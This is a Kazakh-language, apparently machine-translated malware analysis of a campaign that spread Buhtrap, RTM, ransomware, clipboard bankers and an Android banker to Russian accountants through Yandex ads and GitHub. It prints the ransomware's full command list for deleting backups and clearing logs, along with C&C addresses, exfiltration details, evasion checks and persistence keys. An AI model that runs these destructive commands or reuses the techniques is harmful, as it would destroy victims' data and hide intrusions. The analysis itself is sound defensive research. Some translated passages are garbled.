Бухгалтерлерді кибершабуылға бағыттау үшін олар желіде іздейтін жұмыс құжаттарын пайдалана аласыз. Бұл шамамен бір кибер топтың соңғы бірнеше айда белгілі бэкдорларды таратып жүргені. и , сондай-ақ шифрлағыштар мен криптовалюталарды ұрлауға арналған бағдарламалық қамтамасыз ету. Нысандардың көпшілігі Ресейде орналасқан. Шабуыл Yandex.Direct сайтында зиянды жарнаманы орналастыру арқылы жасалған. Ықтимал құрбандар құжат үлгісі ретінде жасырылған зиянды файлды жүктеп алуды сұраған веб-сайтқа жіберілді. Яндекс біздің ескертуімізден кейін зиянды жарнаманы алып тастады.
Buhtrap-тың бастапқы коды бұрын желіде ағып кеткен, сондықтан оны кез келген адам пайдалана алады. Бізде RTM кодының қолжетімділігі туралы ақпарат жоқ.
Бұл мақалада біз сізге зиянкестер Yandex.Direct арқылы зиянды бағдарламаны қалай таратып, оны GitHub-да орналастырғаны туралы айтып береміз. Пост зиянды бағдарламаның техникалық талдауымен аяқталады.
Buhtrap және RTM бизнеске қайта оралды
Таралу механизмі және құрбандары
Зардап шеккендерге жеткізілетін әртүрлі пайдалы жүктер ортақ таралу механизмін бөліседі. Шабуылдаушылар жасаған барлық зиянды файлдар екі түрлі GitHub репозиторийлеріне орналастырылды.
Әдетте, репозиторий жиі өзгеретін бір жүктелетін зиянды файлды қамтиды. GitHub репозиторийдегі өзгерістер тарихын көруге мүмкіндік беретіндіктен, белгілі бір кезеңде қандай зиянды бағдарлама таратылғанын көре аламыз. Жәбірленушіні зиянды файлды жүктеуге сендіру үшін жоғарыдағы суретте көрсетілген blanki-shabloni24[.]ru веб-сайты пайдаланылды.
Сайттың дизайны мен зиянды файлдардың барлық атаулары бір тұжырымдамаға сәйкес келеді - пішіндер, шаблондар, келісім-шарттар, үлгілер және т.б. Buhtrap және RTM бағдарламалық жасақтамасы бухгалтерлерге жасалған шабуылдарда бұрын қолданылғанын ескере отырып, біз жаңа науқандағы стратегия бірдей. Жалғыз сұрақ - жәбірленушінің шабуылдаушылардың сайтына қалай жеткені.
Инфекция
Бұл сайтқа кірген кем дегенде бірнеше ықтимал құрбандар зиянды жарнамаға тартылды. Төменде мысал URL мекенжайы берілген:
https://blanki-shabloni24.ru/?utm_source=yandex&utm_medium=banner&utm_campaign=cid|{blanki_rsya}|context&utm_content=gid|3590756360|aid|6683792549|15114654950_&utm_term=скачать бланк счета&pm_source=bb.f2.kz&pm_block=none&pm_position=0&yclid=1029648968001296456
Сілтемеден көріп отырғаныңыздай, баннер bb.f2[.]kz заңды бухгалтерлік форумда орналастырылған. Баннерлер әртүрлі сайттарда пайда болғанын, барлығының бірдей науқан идентификаторы (blanki_rsya) болғанын және көпшілігі бухгалтерлік есеп немесе заңгерлік көмек қызметтеріне қатысты екенін атап өткен жөн. URL мекенжайы ықтимал жәбірленушінің мақсатты шабуылдар туралы гипотезаны растайтын «шот-фактураны жүктеп алу» сұрауын пайдаланғанын көрсетеді. Төменде баннерлер пайда болған сайттар және сәйкес іздеу сұраулары берілген.
- шот-фактура үлгісін жүктеп алу – bb.f2[.]kz
- үлгі шарт - Ipopen[.]ru
- өтініш шағым үлгісі - 77метров[.]ру
- келісім нысаны - blank-dogovor-kupli-prodazhi[.]ru
- сот өтінішінің үлгісі - zen.yandex[.]ru
- шағым үлгісі - yurday[.]ru
- үлгі келісімшарт нысандары – Regforum[.]ru
- келісім-шарт нысаны – assistentus[.]ru
- пәтер шартының үлгісі – napravah[.]com
- құқықтық шарттар үлгілері - avito[.]ru
blanki-shabloni24[.]ru сайты қарапайым көрнекі бағалаудан өту үшін конфигурацияланған болуы мүмкін. Әдетте, GitHub сілтемесі бар кәсіпқой көрінетін сайтты көрсететін жарнама жаман нәрсе сияқты көрінбейді. Сонымен қатар, шабуылдаушылар зиянды файлдарды репозиторийге шектеулі мерзімге ғана жүктеп салды, мүмкін науқан кезінде. Көбінесе GitHub репозиторийінде бос zip мұрағаты немесе бос EXE файлы болды. Осылайша, шабуылдаушылар Yandex.Direct арқылы арнайы іздеу сұрауларына жауап ретінде келген бухгалтерлер кірген сайттарда жарнама тарата алады.
Әрі қарай, осылай бөлінген әртүрлі пайдалы жүктемелерді қарастырайық.
Жүкті талдау
Таралу хронологиясы
Зиянды науқан 2018 жылдың қазан айының соңында басталды және жазу кезінде белсенді. Бүкіл репозиторий GitHub сайтында жалпыға қолжетімді болғандықтан, біз зиянды бағдарламалардың алты тобының таралуының нақты уақыт кестесін жасадық (төмендегі суретті қараңыз). Біз git тарихымен салыстыру үшін ESET телеметриясы арқылы өлшенген баннер сілтемесінің қашан табылғанын көрсететін жолды қостық. Көріп отырғаныңыздай, бұл GitHub-тағы пайдалы жүктеменің қол жетімділігімен жақсы сәйкес келеді. Ақпан айының соңындағы сәйкессіздікті бізде өзгерістер тарихының бір бөлігінің болмауымен түсіндіруге болады, өйткені репозиторий GitHub-тан біз оны толық ала алмай тұрып жойылған.
Сурет 1. Зиянды бағдарламаларды тарату хронологиясы.
Кодқа қол қою сертификаттары
Науқан бірнеше сертификаттарды пайдаланды. Кейбіреулеріне бірнеше зиянды бағдарламалар тобы қол қойған, бұл әр түрлі үлгілердің бір науқанға тиесілі екенін көрсетеді. Жеке кілттің қол жетімділігіне қарамастан, операторлар екілік файлдарға жүйелі түрде қол қоймады және кілтті барлық үлгілер үшін пайдаланбады. 2019 жылдың ақпан айының соңында шабуылдаушылар жеке кілті жоқ Google сертификатын пайдаланып жарамсыз қолтаңбалар жасай бастады.
Науқанға қатысқан барлық сертификаттар және олар қол қойған зиянды бағдарламалар тобы төмендегі кестеде берілген.
Біз сондай-ақ осы кодқа қол қою сертификаттарын басқа зиянды бағдарламалар тобымен байланыс орнату үшін пайдаландық. Көптеген сертификаттар үшін біз GitHub репозиторийі арқылы таратылмаған үлгілерді таппадық. Дегенмен, TOV «MARIA» сертификаты ботнетке тиесілі зиянды бағдарламаға қол қою үшін пайдаланылды , жарнамалық бағдарлама және кеншілер. Бұл зиянды бағдарламаның осы науқанға қатысты болуы екіталай. Сірә, сертификат darknet желісінде сатып алынған.
Win32/Filecoder.Buhtrap
Біздің назарымызды аударған бірінші компонент жаңадан ашылған Win32/Filecoder.Buhtrap болды. Бұл кейде бумаланған Delphi екілік файлы. Ол негізінен 2019 жылдың ақпан-наурыз айларында таратылды. Ол төлем бағдарламасына сәйкес әрекет етеді - ол жергілікті дискілерді және желілік қалталарды іздейді және тапқан файлдарды шифрлайды. Ол шифрлау кілттерін жіберу үшін сервермен байланыспағандықтан бұзылу үшін Интернет қосылымын қажет етпейді. Оның орнына ол төлем хабарының соңына «таңбалауыш» қосады және операторлармен байланысу үшін электрондық пошта немесе Bitmessage пайдалануды ұсынады.
Мүмкіндігінше көптеген құпия ресурстарды шифрлау үшін Filecoder.Buhtrap шифрлауға кедергі келтіруі мүмкін құнды ақпаратты қамтитын ашық файл өңдегіштері болуы мүмкін негізгі бағдарламалық құралды өшіруге арналған ағынды іске қосады. Мақсатты процестер негізінен деректер қорын басқару жүйелері (ДҚБЖ) болып табылады. Сонымен қатар, Filecoder.Buhtrap деректерді қалпына келтіруді қиындату үшін журнал файлдары мен сақтық көшірмелерді жояды. Ол үшін төмендегі пакеттік сценарийді іске қосыңыз.
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
wbadmin delete systemstatebackup
wbadmin delete systemstatebackup -keepversions:0
wbadmin delete backup
wmic shadowcopy delete
vssadmin delete shadows /all /quiet
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientDefault" /va /f
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /f
reg add "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers"
attrib "%userprofile%documentsDefault.rdp" -s -h
del "%userprofile%documentsDefault.rdp"
wevtutil.exe clear-log Application
wevtutil.exe clear-log Security
wevtutil.exe clear-log System
sc config eventlog start=disabled
Filecoder.Buhtrap веб-сайтқа кірушілер туралы ақпаратты жинауға арналған заңды онлайн IP Logger қызметін пайдаланады. Бұл пәрмен жолының жауапкершілігі болып табылатын төлемдік бағдарламалық құралдың құрбандарын қадағалауға арналған:
mshta.exe "javascript:document.write('');"
Шифрлауға арналған файлдар үш алып тастау тізіміне сәйкес келмесе таңдалады. Біріншіден, келесі кеңейтімдері бар файлдар шифрланбайды: .com, .cmd, .cpl, .dll, .exe, .hta, .lnk, .msc, .msi, .msp, .pif, .scr, .sys және .bat. Екіншіден, толық жолында төмендегі тізімдегі каталог жолдары бар барлық файлдар алынып тасталады.
.{ED7BA470-8E54-465E-825C-99712043E01C}
tor browser
opera
opera software
mozilla
mozilla firefox
internet explorer
googlechrome
google
boot
application data
apple computersafari
appdata
all users
:windows
:system volume information
:nvidia
:intel
Үшіншіден, кейбір файл атаулары да шифрлаудан шығарылады, олардың ішінде төлем хабарының файл атауы. Тізім төменде берілген. Әлбетте, бұл ерекшеліктердің барлығы машинаның жұмыс істеуін қамтамасыз етуге арналған, бірақ ең аз жарамдылықпен.
boot.ini
bootfont.bin
bootsect.bak
desktop.ini
iconcache.db
ntdetect.com
ntldr
ntuser.dat
ntuser.dat.log
ntuser.ini
thumbs.db
winupas.exe
your files are now encrypted.txt
windows update assistant.lnk
master.exe
unlock.exe
unlocker.exe
Файлды шифрлау схемасы
Орындағаннан кейін зиянды бағдарлама 512 биттік RSA кілт жұбын жасайды. Жеке көрсеткіш (d) және модуль (n) содан кейін қатты кодталған 2048 биттік ашық кілтпен (ашық көрсеткіш және модуль), zlib-кептелген және base64 кодталған шифрланады. Бұған жауапты код 2-суретте көрсетілген.
Сурет 2. 512-биттік RSA кілт жұбын генерациялау процесінің Hex-Rays декомпиляциясының нәтижесі.
Төменде төлем хабарына тіркелген таңбалауыш болып табылатын жасалған жеке кілті бар қарапайым мәтіннің мысалы келтірілген.
DF9228F4F3CA93314B7EE4BEFC440030665D5A2318111CC3FE91A43D781E3F91BD2F6383E4A0B4F503916D75C9C576D5C2F2F073ADD4B237F7A2B3BF129AE2F399197ECC0DD002D5E60C20CE3780AB9D1FE61A47D9735036907E3F0CF8BE09E3E7646F8388AAC75FF6A4F60E7F4C2F697BF6E47B2DBCDEC156EAD854CADE53A239
Төменде шабуылдаушылардың ашық кілті берілген.
e = 0x72F750D7A93C2C88BFC87AD4FC0BF4CB45E3C55701FA03D3E75162EB5A97FDA7ACF8871B220A33BEDA546815A9AD9AA0C2F375686F5009C657BB3DF35145126C71E3C2EADF14201C8331699FD0592C957698916FA9FEA8F0B120E4296193AD7F3F3531206608E2A8F997307EE7D14A9326B77F1B34C4F1469B51665757AFD38E88F758B9EA1B95406E72B69172A7253F1DFAA0FA02B53A2CC3A7F0D708D1A8CAA30D954C1FEAB10AD089EFB041DD016DCAAE05847B550861E5CACC6A59B112277B60AC0E4E5D0EA89A5127E93C2182F77FDA16356F4EF5B7B4010BCCE1B1331FCABFFD808D7DAA86EA71DFD36D7E701BD0050235BD4D3F20A97AAEF301E785005
n = 0x212ED167BAC2AEFF7C3FA76064B56240C5530A63AB098C9B9FA2DE18AF9F4E1962B467ABE2302C818860F9215E922FC2E0E28C0946A0FC746557722EBB35DF432481AC7D5DDF69468AF1E952465E61DDD06CDB3D924345A8833A7BC7D5D9B005585FE95856F5C44EA917306415B767B684CC85E7359C23231C1DCBBE714711C08848BEB06BD287781AEB53D94B7983EC9FC338D4320129EA4F568C410317895860D5A85438B2DA6BB3BAAE9D9CE65BCEA6760291D74035775F28DF4E6AB1A748F78C68AB07EA166A7309090202BB3F8FBFC19E44AC0B4D3D0A37C8AA5FA90221DA7DB178F89233E532FF90B55122B53AB821E1A3DB0F02524429DEB294B3A4EDD
Файлдар 128 биттік кілтпен AES-256-CBC көмегімен шифрланады. Әрбір шифрланған файл үшін жаңа кілт және жаңа инициализация векторы жасалады. Негізгі ақпарат шифрланған файлдың соңына қосылады. Шифрланған файлдың пішімін қарастырайық.
Шифрланған файлдарда келесі тақырып болады:
VEGA сиқырлы мәні қосылған бастапқы файл деректері бірінші 0x5000 байтқа шифрланады. Барлық шифрды шешу ақпараты келесі құрылымы бар файлға тіркеледі:
- Файл өлшемі маркерінде файл өлшемі 0x5000 байттан үлкен екенін көрсететін белгі бар
— AES кілтінің блогы = ZlibCompress(RSAEncrypt(AES кілті + IV, жасалған RSA кілт жұбының ашық кілті))
- RSA кілтінің блогы = ZlibCompress(RSAEncrypt (жасалған RSA жеке кілті, қатты кодталған RSA ашық кілті))
Win32/ClipBanker
Win32/ClipBanker - 2018 жылдың қазан айының соңынан желтоқсан айының басына дейін мезгіл-мезгіл таратылатын құрамдас. Оның рөлі алмасу буферінің мазмұнын бақылау болып табылады, ол криптовалюта әмияндарының мекенжайларын іздейді. Әмиянның мақсатты мекенжайын анықтағаннан кейін, ClipBanker оны операторларға тиесілі деп есептейтін мекенжаймен ауыстырады. Біз зерттеген үлгілер қорапқа салынбаған немесе жасырылған емес. Тәртіпті бүркемелеу үшін қолданылатын жалғыз механизм жолды шифрлау болып табылады. Оператор әмиянының мекенжайлары RC4 арқылы шифрланады. Мақсатты криптовалюталар - Bitcoin, Bitcoin cash, Dogecoin, Ethereum және Ripple.
Зиянды бағдарлама шабуылдаушылардың Bitcoin әмияндарына тараған кезеңде VTS-ке аз мөлшерде жіберілді, бұл науқанның сәттілігіне күмән келтіреді. Бұған қоса, бұл транзакциялардың ClipBanker-ке қатысы бар екенін көрсететін ешқандай дәлел жоқ.
Win32/RTM
Win32/RTM құрамдас бөлігі 2019 жылдың наурыз айының басында бірнеше күн бойы таратылды. RTM қашықтағы банктік жүйелерге бағытталған Delphi тілінде жазылған трояндық банкир. 2017 жылы ESET зерттеушілері жариялады бұл бағдарламаның сипаттамасы әлі де өзекті. 2019 жылдың қаңтарында Palo Alto Networks шығарылды .
Buhtrap жүктегіш
Біраз уақыттан бері GitHub жүйесінде бұрынғы Buhtrap құралдарына ұқсамайтын жүктеуші қолжетімді болды. Ол бұрылады https://94.100.18[.]67/RSS.php?<some_id> келесі кезеңге өтіп, оны тікелей жадқа жүктейді. Екінші кезең кодының екі әрекетін ажырата аламыз. Бірінші URL мекенжайында RSS.php тікелей Buhtrap бэкдорынан өтті - бұл бэкдор бастапқы кодтың ағып кетуінен кейінгі қолжетімдіге өте ұқсас.
Бір қызығы, біз Buhtrap бэкдоры бар бірнеше науқанды көреміз және оларды әртүрлі операторлар басқарады деген болжам бар. Бұл жағдайда негізгі айырмашылық - бэкдор тікелей жадқа жүктеледі және біз айтқан DLL орналастыру процесімен әдеттегі схеманы пайдаланбайды. . Сонымен қатар, операторлар C&C серверіне желілік трафикті шифрлау үшін пайдаланылатын RC4 кілтін өзгертті. Біз көрген науқандардың көпшілігінде операторлар бұл кілтті өзгертуге алаңдамады.
Екінші, күрделірек әрекет RSS.php URL мекенжайы басқа жүктеушіге жіберілді. Ол динамикалық импорт кестесін қайта құру сияқты кейбір түсініксіздікті жүзеге асырды. Жүктеуіштің мақсаты - C&C серверімен байланысу [.]com/api/F27F84EDA4D13B15/2, журналдарды жіберіп, жауапты күтіңіз. Ол жауапты блок ретінде өңдейді, оны жадқа жүктейді және оны орындайды. Бұл жүктегішті орындаған кезде біз көрген пайдалы жүк бірдей Buhtrap бэкдоры болды, бірақ басқа компоненттер болуы мүмкін.
Android/Spy.Banker
Бір қызығы, Android жүйесіне арналған құрамдас GitHub репозиторийінде де табылды. Ол негізгі филиалда бір күн ғана болды - 1 жылдың 2018 қарашасы. GitHub сайтында жарияланғаннан басқа, ESET телеметриясы бұл зиянды бағдарламаның таратылуының ешқандай дәлелін таппайды.
Құрамдас Android қолданбалар пакеті (APK) ретінде орналастырылды. Бұл қатты түсініксіз. Зиянды әрекет APK ішінде орналасқан шифрланған JAR ішінде жасырылған. Ол осы кілт арқылы RC4 шифрланған:
key = [
0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96
]
Жолдарды шифрлау үшін бірдей кілт пен алгоритм қолданылады. JAR орналасқан APK_ROOT + image/files. Файлдың алғашқы 4 байты шифрланған JAR ұзындығын қамтиды, ол ұзындық өрісінен кейін бірден басталады.
Файлдың шифрын шешкеннен кейін біз оның бұрын Анубис екенін білдік Android үшін банкир. Зиянды бағдарламаның келесі мүмкіндіктері бар:
- микрофонды жазу
- скриншоттарды түсіру
- GPS координаттарын алу
- keylogger
- құрылғы деректерін шифрлау және төлемді талап ету
- спам жіберу
Бір қызығы, банкир басқа C&C серверін алу үшін Twitter-ді резервтік байланыс арнасы ретінде пайдаланды. Біз талдаған үлгі @JonesTrader тіркелгісін пайдаланды, бірақ талдау кезінде ол әлдеқашан бұғатталған.
Банкир Android құрылғысындағы мақсатты қолданбалардың тізімін қамтиды. Бұл Sophos зерттеуінде алынған тізімнен ұзағырақ. Тізімге көптеген банктік қосымшалар, Amazon және eBay сияқты онлайн сауда бағдарламалары және криптовалюта қызметтері кіреді.
MSIL/ClipBanker.IH
Осы науқанның бөлігі ретінде таратылған соңғы құрамдас 2019 жылдың наурызында пайда болған .NET Windows орындалатын файлы болды. Зерттелген нұсқалардың көпшілігі ConfuserEx v1.0.0 нұсқасымен пакеттелген. ClipBanker сияқты бұл компонент алмасу буферін пайдаланады. Оның мақсаты - криптовалюталардың кең ауқымы, сондай-ақ Steam-дегі ұсыныстар. Сонымен қатар, ол Bitcoin жеке WIF кілтін ұрлау үшін IP Logger қызметін пайдаланады.
Қорғау механизмдері
ConfuserEx отладтауды, демпингті және бұрмалауды болдырмауда ұсынатын артықшылықтарға қоса, құрамдас антивирустық өнімдер мен виртуалды машиналарды анықтау мүмкіндігін қамтиды.
Виртуалды машинада жұмыс істейтінін тексеру үшін зиянды бағдарлама BIOS ақпаратын сұрау үшін кірістірілген Windows WMI пәрмен жолын (WMIC) пайдаланады, атап айтқанда:
wmic bios
Содан кейін бағдарлама пәрмен шығысын талдайды және түйінді сөздерді іздейді: VBOX, VirtualBox, XEN, qemu, bochs, VM.
Вирусқа қарсы өнімдерді анықтау үшін зиянды бағдарлама Windows қауіпсіздік орталығына Windows басқару құралдары (WMI) сұрауын жібереді ManagementObjectSearcher API төменде көрсетілгендей. base64-тен декодтаудан кейін қоңырау келесідей болады:
ManagementObjectSearcher('rootSecurityCenter2', 'SELECT * FROM AntivirusProduct')
Сурет 3. Вирусқа қарсы өнімдерді анықтау процесі.
Сонымен қатар, зиянды бағдарлама бар-жоғын тексереді , алмасу буферінің шабуылдарынан қорғау құралы және егер іске қосылса, сол процестегі барлық ағындарды тоқтатады, осылайша қорғауды өшіреді.
Табандылық
Біз зерттеген зиянды бағдарламаның нұсқасы көшіріледі %APPDATA%googleupdater.exe және google каталогы үшін «жасырын» төлсипатын орнатады. Содан кейін ол мәнді өзгертеді SoftwareMicrosoftWindows NTCurrentVersionWinlogonshell Windows тізілімінде және жолды қосады updater.exe. Осылайша, зиянды бағдарлама пайдаланушы жүйеге кірген сайын орындалады.
Зиянды мінез-құлық
ClipBanker сияқты, зиянды бағдарлама алмасу буферінің мазмұнын бақылайды және криптовалюта әмиянының мекенжайларын іздейді және табылған кезде оны оператор мекенжайларының бірімен ауыстырады. Төменде кодта табылған нәрсеге негізделген мақсатты мекенжайлар тізімі берілген.
BTC_P2PKH, BTC_P2SH, BTC_BECH32, BCH_P2PKH_CashAddr, BTC_GOLD, LTC_P2PKH, LTC_BECH32, LTC_P2SH_M, ETH_ERC20, XMR, DCR, XRP, DOGE, DASH, ZEC_T_ADDR, ZEC_Z_ADDR, STELLAR, NEO, ADA, IOTA, NANO_1, NANO_3, BANANO_1, BANANO_3, STRATIS, NIOBIO, LISK, QTUM, WMZ, WMX, WME, VERTCOIN, TRON, TEZOS, QIWI_ID, YANDEX_ID, NAMECOIN, B58_PRIVATEKEY, STEAM_URL
Мекенжайдың әрбір түрі үшін сәйкес тұрақты өрнек бар. STEAM_URL мәні Steam жүйесіне шабуыл жасау үшін пайдаланылады, оны буферде анықтау үшін пайдаланылатын тұрақты өрнектен көруге болады:
b(https://|http://|)steamcommunity.com/tradeoffer/new/?partner=[0-9]+&token=[a-zA-Z0-9]+b
Эксфильтрация арнасы
Буфердегі мекенжайларды ауыстырудан басқа, зиянды бағдарлама Bitcoin, Bitcoin Core және Electrum Bitcoin әмияндарының жеке WIF кілттеріне бағытталған. Бағдарлама WIF жеке кілтін алу үшін plogger.org сайтын эксфильтрация арнасы ретінде пайдаланады. Бұл әрекетті орындау үшін операторлар төменде көрсетілгендей пайдаланушы-агент HTTP тақырыбына жеке кілт деректерін қосады.
Сурет 4. Шығу деректері бар IP Logger консолі.
Операторлар әмияндарды эксфильтрациялау үшін iplogger.org сайтын пайдаланбады. Олар өрістегі 255 таңба шектеуіне байланысты басқа әдіске жүгінген болуы мүмкін User-AgentIP Logger веб-интерфейсінде көрсетіледі. Біз зерттеген үлгілерде басқа шығыс сервері орта айнымалысында сақталды DiscordWebHook. Бір қызығы, бұл орта айнымалысы кодтың ешбір жерінде тағайындалмаған. Бұл зиянды бағдарламаның әлі де әзірлену үстінде екенін және айнымалының оператордың сынақ машинасына тағайындалғанын көрсетеді.
Бағдарламаның әзірлену үстінде екендігінің тағы бір белгісі бар. Екілік файл екі iplogger.org URL мекенжайын қамтиды және деректер эксфильтрацияланған кезде екеуі де сұралады. Осы URL мекенжайларының біріне сұрауда Referer өрісіндегі мән «DEV /» алдында болады. Біз сондай-ақ ConfuserEx арқылы бумаланбаған нұсқаны таптық, осы URL мекенжайының алушысы DevFeedbackUrl деп аталады. Қоршаған ортаның айнымалы атауына сүйене отырып, операторлар криптовалюта әмияндарын ұрлау үшін заңды Discord қызметін және оның веб-қадағалау жүйесін пайдалануды жоспарлап отыр деп ойлаймыз.
қорытынды
Бұл науқан кибершабуылдарда заңды жарнамалық қызметтерді пайдаланудың мысалы болып табылады. Схема ресейлік ұйымдарға бағытталған, бірақ ресейлік емес қызметтерді пайдаланатын мұндай шабуылды көрсек, таң қалмас едік. Ымыраға жол бермеу үшін пайдаланушылар жүктеп алатын бағдарламалық құралдың көзінің беделіне сенімді болуы керек.
Компромисс көрсеткіштерінің толық тізімі және MITER ATT&CK атрибуттары мына жерден қол жетімді .
Ақпарат көзі: www.habr.com